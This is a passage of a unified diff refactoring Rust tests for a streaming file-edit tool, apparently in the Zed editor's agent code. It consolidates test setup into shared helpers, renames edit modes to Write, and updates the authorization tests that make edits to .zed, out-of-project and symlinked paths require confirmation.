"root/file.txt", @@ -2590,7 +2067,10 @@ mod tests { })); cx.run_until_parked(); - // Buffer should NOT be modified — the single edit is still in-progress + // The edit's old_text and new_text both arrived in one partial, so + // the old_text is resolved and new_text is being streamed via + // StreamingDiff. The buffer reflects the in-progress diff (new text + // inserted, old text not yet fully removed until finalization). let buffer_text = project.update(cx, |project, cx| { let pp = project .find_project_path(&PathBuf::from("root/file.txt"), cx) @@ -2599,12 +2079,12 @@ mod tests { }); assert_eq!( buffer_text.as_deref(), - Some("hello world\n"), - "Single in-progress edit should not be applied during streaming" + Some("goodbye worldhello world\n"), + "In-progress streaming diff: new text inserted, old text not yet removed" ); // Send final — the edit is applied during finalization - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Single edit", "path": "root/file.txt", "mode": "edit", @@ -2620,44 +2100,12 @@ mod tests { #[gpui::test] async fn test_streaming_input_partials_then_final(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input): (ToolInputSender, ToolInput) = + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let (mut sender, input): (ToolInputSender, ToolInput) = ToolInput::test(); - let (event_stream, _event_rx) = ToolCallEventStream::test(); - let task = cx.update(|cx| { - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run(input, event_stream, cx) - }); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send progressively more complete partial snapshots, as the LLM would sender.send_partial(json!({ @@ -2681,7 +2129,7 @@ mod tests { cx.run_until_parked(); // Send the final complete input - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", @@ -2697,44 +2145,12 @@ mod tests { #[gpui::test] async fn test_streaming_input_sender_dropped_before_final(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "hello world\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input): (ToolInputSender, ToolInput) = + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world\n"})).await; + let (mut sender, input): (ToolInputSender, ToolInput) = ToolInput::test(); - let (event_stream, _event_rx) = ToolCallEventStream::test(); - let task = cx.update(|cx| { - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run(input, event_stream, cx) - }); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send a partial then drop the sender without sending final sender.send_partial(json!({ @@ -2753,41 +2169,14 @@ mod tests { #[gpui::test] async fn test_streaming_input_recv_drains_partials(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({"dir": {}})).await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; // Create a channel and send multiple partials before a final, then use // ToolInput::resolved-style immediate delivery to confirm recv() works // when partials are already buffered. - let (sender, input): (ToolInputSender, ToolInput) = + let (mut sender, input): (ToolInputSender, ToolInput) = ToolInput::test(); - let (event_stream, _event_rx) = ToolCallEventStream::test(); - let task = cx.update(|cx| { - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run(input, event_stream, cx) - }); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Buffer several partials before sending the final sender.send_partial(json!({"display_description": "Create"})); @@ -2795,12 +2184,12 @@ mod tests { sender.send_partial(json!({ "display_description": "Create", "path": "root/dir/new.txt", - "mode": "create" + "mode": "write" })); - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Create", "path": "root/dir/new.txt", - "mode": "create", + "mode": "write", "content": "streamed content" })); @@ -2813,7 +2202,7 @@ mod tests { #[gpui::test] async fn test_streaming_resolve_path_for_creating_file(cx: &mut TestAppContext) { - let mode = StreamingEditFileMode::Create; + let mode = StreamingEditFileMode::Write; let result = test_resolve_path(&mode, "root/new.txt", cx); assert_resolved_path_eq(result.await, rel_path("new.txt")); @@ -2825,14 +2214,17 @@ mod tests { assert_resolved_path_eq(result.await, rel_path("dir/new.txt")); let result = test_resolve_path(&mode, "root/dir/subdir/existing.txt", cx); + assert_resolved_path_eq(result.await, rel_path("dir/subdir/existing.txt")); + + let result = test_resolve_path(&mode, "root/dir/subdir", cx); assert_eq!( - result.await.unwrap_err().to_string(), - "Can't create file: file already exists" + result.await.unwrap_err(), + "Can't write to file: path is a directory" ); let result = test_resolve_path(&mode, "root/dir/nonexistent_dir/new.txt", cx); assert_eq!( - result.await.unwrap_err().to_string(), + result.await.unwrap_err(), "Can't create file: parent directory doesn't exist" ); } @@ -2850,14 +2242,11 @@ mod tests { assert_resolved_path_eq(result.await, rel_path(path_without_root)); let result = test_resolve_path(&mode, "root/nonexistent.txt", cx); - assert_eq!( - result.await.unwrap_err().to_string(), - "Can't edit file: path not found" - ); + assert_eq!(result.await.unwrap_err(), "Can't edit file: path not found"); let result = test_resolve_path(&mode, "root/dir", cx); assert_eq!( - result.await.unwrap_err().to_string(), + result.await.unwrap_err(), "Can't edit file: path is a directory" ); } @@ -2866,7 +2255,7 @@ mod tests { mode: &StreamingEditFileMode, path: &str, cx: &mut TestAppContext, - ) -> anyhow::Result { + ) -> Result { init_test(cx); let fs = project::FakeFs::new(cx.executor()); @@ -2883,11 +2272,11 @@ mod tests { .await; let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - cx.update(|cx| resolve_path(mode.clone(), &PathBuf::from(path), &project, cx)) + cx.update(|cx| resolve_path(*mode, &PathBuf::from(path), &project, cx)) } #[track_caller] - fn assert_resolved_path_eq(path: anyhow::Result, expected: &RelPath) { + fn assert_resolved_path_eq(path: Result, expected: &RelPath) { let actual = path.expect("Should return valid path").path; assert_eq!(actual.as_ref(), expected); } @@ -2898,8 +2287,8 @@ mod tests { let fs = project::FakeFs::new(cx.executor()); fs.insert_tree("/root", json!({"src": {}})).await; - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; + let (tool, project, action_log, fs, thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; let rust_language = Arc::new(language::Language::new( language::LanguageConfig { @@ -2948,9 +2337,10 @@ mod tests { project.register_buffer_with_language_servers(&buffer, cx) }); - const UNFORMATTED_CONTENT: &str = "fn main() {println!(\"Hello!\");}\n"; - const FORMATTED_CONTENT: &str = - "This file was formatted by the fake formatter in the test.\n"; + const UNFORMATTED_CONTENT: &str = "fn main() {println!(\"Hello!\");}\ +"; + const FORMATTED_CONTENT: &str = "This file was formatted by the fake formatter in the test.\ +"; // Get the fake language server and set up formatting handler let fake_language_server = fake_language_servers.next().await.unwrap(); @@ -2963,20 +2353,6 @@ mod tests { } }); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - // Test with format_on_save enabled cx.update(|cx| { SettingsStore::update_global(cx, |store, cx| { @@ -2989,28 +2365,22 @@ mod tests { }); // Use streaming pattern so executor can pump the LSP request/response - let (sender, input) = ToolInput::::test(); + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry.clone(), - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); sender.send_partial(json!({ "display_description": "Create main function", "path": "root/src/main.rs", - "mode": "overwrite" + "mode": "write" })); cx.run_until_parked(); - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Create main function", "path": "root/src/main.rs", - "mode": "overwrite", + "mode": "write", "content": UNFORMATTED_CONTENT })); @@ -3046,28 +2416,29 @@ mod tests { }); }); - let (sender, input) = ToolInput::::test(); + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - let tool = Arc::new(StreamingEditFileTool::new( + let tool2 = Arc::new(StreamingEditFileTool::new( project.clone(), thread.downgrade(), + action_log.clone(), language_registry, )); - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool2.run(input, event_stream, cx)); sender.send_partial(json!({ "display_description": "Update main function", "path": "root/src/main.rs", - "mode": "overwrite" + "mode": "write" })); cx.run_until_parked(); - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Update main function", "path": "root/src/main.rs", - "mode": "overwrite", + "mode": "write", "content": UNFORMATTED_CONTENT })); @@ -3090,7 +2461,6 @@ mod tests { let fs = project::FakeFs::new(cx.executor()); fs.insert_tree("/root", json!({"src": {}})).await; - fs.save( path!("/root/src/main.rs").as_ref(), &"initial content".into(), @@ -3098,22 +2468,9 @@ mod tests { ) .await .unwrap(); - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); + let (tool, project, action_log, fs, thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; + let language_registry = project.read_with(cx, |p, _cx| p.languages().clone()); // Test with remove_trailing_whitespace_on_save enabled cx.update(|cx| { @@ -3133,20 +2490,14 @@ mod tests { let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Create main function".into(), - path: "root/src/main.rs".into(), - mode: StreamingEditFileMode::Overwrite, - content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), - edits: None, - }; - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry.clone(), - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Create main function".into(), + path: "root/src/main.rs".into(), + mode: StreamingEditFileMode::Write, + content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), + edits: None, + }), ToolCallEventStream::test().0, cx, ) @@ -3178,22 +2529,23 @@ mod tests { }); }); + let tool2 = Arc::new(StreamingEditFileTool::new( + project.clone(), + thread.downgrade(), + action_log.clone(), + language_registry, + )); + let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Update main function".into(), - path: "root/src/main.rs".into(), - mode: StreamingEditFileMode::Overwrite, - content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), - edits: None, - }; - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool2.run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Update main function".into(), + path: "root/src/main.rs".into(), + mode: StreamingEditFileMode::Write, + content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), + edits: None, + }), ToolCallEventStream::test().0, cx, ) @@ -3213,29 +2565,7 @@ mod tests { #[gpui::test] async fn test_streaming_authorize(cx: &mut TestAppContext) { - init_test(cx); - let fs = project::FakeFs::new(cx.executor()); - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - fs.insert_tree("/root", json!({})).await; + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({})).await; // Test 1: Path with .zed component should require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); @@ -3269,7 +2599,7 @@ mod tests { }) .await .unwrap(); - assert!(stream_rx.try_next().is_err()); + assert!(stream_rx.try_recv().is_err()); // Test 4: Path with .zed in the middle should require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); @@ -3316,7 +2646,7 @@ mod tests { cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 5.2", &stream_tx, cx)) .await .unwrap(); - assert!(stream_rx.try_next().is_err()); + assert!(stream_rx.try_recv().is_err()); // 5.3: Normal in-project path with allow — no confirmation needed let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); @@ -3330,7 +2660,7 @@ mod tests { }) .await .unwrap(); - assert!(stream_rx.try_next().is_err()); + assert!(stream_rx.try_recv().is_err()); // 5.4: With Confirm default, non-project paths still prompt cx.update(|cx| { @@ -3356,27 +2686,8 @@ mod tests { fs.insert_tree("/outside", json!({})).await; fs.insert_symlink("/root/link", PathBuf::from("/outside")) .await; - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project, - thread.downgrade(), - language_registry, - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; cx.update(|cx| { let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); @@ -3407,7 +2718,10 @@ mod tests { event .response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); authorize_task.await.unwrap(); } @@ -3439,29 +2753,8 @@ mod tests { ) .await .unwrap(); - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - cx.executor().run_until_parked(); - - let language_registry = project.read_with(cx, |project, _| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let _authorize_task = cx.update(|cx| { @@ -3506,29 +2799,8 @@ mod tests { ) .await .unwrap(); - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - cx.executor().run_until_parked(); - - let language_registry = project.read_with(cx, |project, _| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let authorize_task = cx.update(|cx| { @@ -3583,29 +2855,8 @@ mod tests { ) .await .unwrap(); - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - cx.executor().run_until_parked(); - - let language_registry = project.read_with(cx, |project, _| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let result = cx @@ -3622,8 +2873,8 @@ mod tests { assert!(result.is_err(), "Tool should fail when policy denies"); assert!( !matches!( - stream_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + stream_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Deny policy should not emit symlink authorization prompt", ); @@ -3634,26 +2885,8 @@ mod tests { init_test(cx); let fs = project::FakeFs::new(cx.executor()); fs.insert_tree("/project", json!({})).await; - let project = Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; let test_cases = vec![ ( @@ -3683,7 +2916,7 @@ mod tests { } else { auth.await.unwrap(); assert!( - stream_rx.try_next().is_err(), + stream_rx.try_recv().is_err(), "Failed for case: {} - path: {} - expected no confirmation but got one", description, path @@ -3696,7 +2929,6 @@ mod tests { async fn test_streaming_needs_confirmation_with_multiple_worktrees(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( "/workspace/frontend", json!({ @@ -3724,36 +2956,16 @@ mod tests { }), ) .await; - - let project = Project::test( - fs.clone(), - [ + let (tool, _project, _action_log, _fs, _thread) = setup_test_with_fs( + cx, + fs, + &[ path!("/workspace/frontend").as_ref(), path!("/workspace/backend").as_ref(), path!("/workspace/shared").as_ref(), ], - cx, ) .await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry.clone(), - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); let test_cases = vec![ ("frontend/src/main.js", false, "File in first worktree"), @@ -3781,7 +2993,7 @@ mod tests { } else { auth.await.unwrap(); assert!( - stream_rx.try_next().is_err(), + stream_rx.try_recv().is_err(), "Failed for case: {} - path: {} - expected no confirmation but got one", description, path @@ -3808,26 +3020,8 @@ mod tests { }), ) .await; - let project = Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry.clone(), - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; let test_cases = vec![ ("", false, "Empty path is treated as project root"), @@ -3859,7 +3053,7 @@ mod tests { stream_rx.expect_authorization().await; } else { assert!( - stream_rx.try_next().is_err(), + stream_rx.try_recv().is_err(), "Failed for case: {} - path: {} - expected no confirmation but got one", description, path @@ -3883,32 +3077,10 @@ mod tests { }), ) .await; - let project = Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry.clone(), - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; - let modes = vec![ - StreamingEditFileMode::Edit, - StreamingEditFileMode::Create, - StreamingEditFileMode::Overwrite, - ]; + let modes = vec![StreamingEditFileMode::Edit, StreamingEditFileMode::Write]; for _mode in modes { // Test .zed path with different modes @@ -3949,7 +3121,7 @@ mod tests { }) .await .unwrap(); - assert!(stream_rx.try_next().is_err()); + assert!(stream_rx.try_recv().is_err()); } } @@ -3957,26 +3129,9 @@ mod tests { async fn test_streaming_initial_title_with_partial_input(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); - let project = Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project, - thread.downgrade(), - language_registry, - )); + fs.insert_tree("/project", json!({})).await; + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; cx.update(|cx| { assert_eq!( @@ -4031,37 +3186,19 @@ mod tests { init_test(cx); let fs = project::FakeFs::new(cx.executor()); fs.insert_tree("/", json!({"main.rs": ""})).await; - - let project = Project::test(fs.clone(), [path!("/").as_ref()], cx).await; - let languages = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry.clone(), - Templates::new(), - Some(model.clone()), - cx, - ) - }); + let (tool, project, action_log, _fs, thread) = + setup_test_with_fs(cx, fs, &[path!("/").as_ref()]).await; + let language_registry = project.read_with(cx, |p, _cx| p.languages().clone()); // Ensure the diff is finalized after the edit completes. { - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - languages.clone(), - )); let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let edit = cx.update(|cx| { - tool.run( + tool.clone().run( ToolInput::resolved(StreamingEditFileToolInput { display_description: "Edit file".into(), path: path!("/main.rs").into(), - mode: StreamingEditFileMode::Overwrite, + mode: StreamingEditFileMode::Write, content: Some("new content".into()), edits: None, }), @@ -4082,7 +3219,8 @@ mod tests { let tool = Arc::new(StreamingEditFileTool::new( project.clone(), thread.downgrade(), - languages.clone(), + action_log, + language_registry, )); let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let edit = cx.update(|cx| { @@ -4090,7 +3228,7 @@ mod tests { ToolInput::resolved(StreamingEditFileToolInput { display_description: "Edit file".into(), path: path!("/main.rs").into(), - mode: StreamingEditFileMode::Overwrite, + mode: StreamingEditFileMode::Write, content: Some("dropped content".into()), edits: None, }), @@ -4109,42 +3247,12 @@ mod tests { #[gpui::test] async fn test_streaming_consecutive_edits_work(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "test.txt": "original content" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let languages = project.read_with(cx, |project, _| project.languages().clone()); - let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - + let (tool, project, action_log, _fs, _thread) = + setup_test(cx, json!({"test.txt": "original content"})).await; let read_tool = Arc::new(crate::ReadFileTool::new( - thread.downgrade(), project.clone(), - action_log, - )); - let edit_tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - languages, + action_log.clone(), + true, )); // Read the file first @@ -4165,13 +3273,13 @@ mod tests { // First edit should work let edit_result = cx .update(|cx| { - edit_tool.clone().run( + tool.clone().run( ToolInput::resolved(StreamingEditFileToolInput { display_description: "First edit".into(), path: "root/test.txt".into(), mode: StreamingEditFileMode::Edit, content: None, - edits: Some(vec![EditOperation { + edits: Some(vec![Edit { old_text: "original content".into(), new_text: "modified content".into(), }]), @@ -4190,13 +3298,13 @@ mod tests { // Second edit should also work because the edit updated the recorded read time let edit_result = cx .update(|cx| { - edit_tool.clone().run( + tool.clone().run( ToolInput::resolved(StreamingEditFileToolInput { display_description: "Second edit".into(), path: "root/test.txt".into(), mode: StreamingEditFileMode::Edit, content: None, - edits: Some(vec![EditOperation { + edits: Some(vec![Edit { old_text: "modified content".into(), new_text: "further modified content".into(), }]), @@ -4215,42 +3323,12 @@ mod tests { #[gpui::test] async fn test_streaming_external_modification_detected(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "test.txt": "original content" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let languages = project.read_with(cx, |project, _| project.languages().clone()); - let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - + let (tool, project, action_log, fs, _thread) = + setup_test(cx, json!({"test.txt": "original content"})).await; let read_tool = Arc::new(crate::ReadFileTool::new( - thread.downgrade(), - project.clone(), - action_log, - )); - let edit_tool = Arc::new(StreamingEditFileTool::new( project.clone(), - thread.downgrade(), - languages, + action_log.clone(), + true, )); // Read the file first @@ -4299,13 +3377,13 @@ mod tests { // Try to edit - should fail because file was modified externally let result = cx .update(|cx| { - edit_tool.clone().run( + tool.clone().run( ToolInput::resolved(StreamingEditFileToolInput { display_description: "Edit after external change".into(), path: "root/test.txt".into(), mode: StreamingEditFileMode::Edit, content: None, - edits: Some(vec![EditOperation { + edits: Some(vec![Edit { old_text: "externally modified content".into(), new_text: "new content".into(), }]), @@ -4316,54 +3394,32 @@ mod tests { }) .await; - let StreamingEditFileToolOutput::Error { error } = result.unwrap_err() else { + let StreamingEditFileToolOutput::Error { + error, + diff, + input_path, + } = result.unwrap_err() + else { panic!("expected error"); }; + assert!( error.contains("has been modified since you last read it"), "Error should mention file modification, got: {}", error ); + assert!(diff.is_empty()); + assert!(input_path.is_none()); } #[gpui::test] async fn test_streaming_dirty_buffer_detected(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "test.txt": "original content" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = 